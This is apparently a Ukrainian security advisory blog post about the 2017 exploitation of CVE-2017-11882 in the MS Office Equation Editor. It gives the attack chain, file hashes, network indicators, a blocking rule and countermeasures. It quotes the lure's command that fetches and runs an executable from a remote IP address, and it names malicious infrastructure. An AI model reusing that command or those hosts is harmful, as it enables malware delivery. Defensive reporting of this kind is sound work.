Archive | 23/11/2017

IOC_EQNEDT32_211117

Запуск коду через редактор формул або CVE-2017-11882

Доброго вечора, панове.

Увага, 21го листопада було зафіксовано перші спроби застосування CVE-2017-11882 для доставки шкідливого коду.

Рівень загрози – високий!

У зоні ризику всі, хто не встановив оновлення MS Office.

Ця вразливість редактору формул, яка стосується MS Office 2007, 2010, 2013 та 2016.

Трохи аналітики:

  • код запускається від імені простого користувача через процес редактору формул
  • редактор формул отримує команди не напряму від додатку MS Office, а через svchost
  • код виконується одразу по факту відкриття документу, без діалогових вікон!
  • у файлі, який використовувався зловмисниками запуск/завантаження проміжного payload був реалізований через cmd.exe
  • розсилка яка проводилась 21го листопада не була направлена на українські організації
  • найближчим часом слід очікувати застосування цього методу при атаках на наші підприємства
  • відео, детальний опис експлуатації та тестовий файл на запуск calc.exe

Схема атаки:

email > Attach (RTF) > WINWORD.EXE > SVCHOST.EXE > EQNEDT32.EXE > CMD.EXE > ...

Маркери IOC:

документ приманка:

Filename      Swift changes.rtf
SHA256      17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c
Size            31.07 KB

Спроба відкрити документ-приманку ініціює завантаження та запуск проміжної частини засобами cmd

cmd /c start \\138.68.234.128\w\w.exe

файл

Filename     w.exe
SHA256      60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7
Size           240.5 KB

На даний момент посилання вже недійсне.

Мережеві IOC:

завантаження проміжного payload

138.68.234.128

трафік скомпрометованої системи

104.144.207.207

Що можна було зробити аби уникнути інфікування ?

Для тих, у кого немає можливості на 100% встановити виправлення вразливості, можна застосувати просте правило Access Protection

Name: _11882_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: EQNEDT32.EXE
File actions to prevent:
+ Read
+ Write
+ Execute

Контрзаходи:

  • Розгортання оновлень CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability
  • Зміна параметру Compatibility Flags в реєстрі – у моєму випадку не виправило запуску довільного коду
  • Заборона запуску вразливого процесу EQNEDT32.EXE (VSE/ENS Access Protection – див. приклад вище, групові політики)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements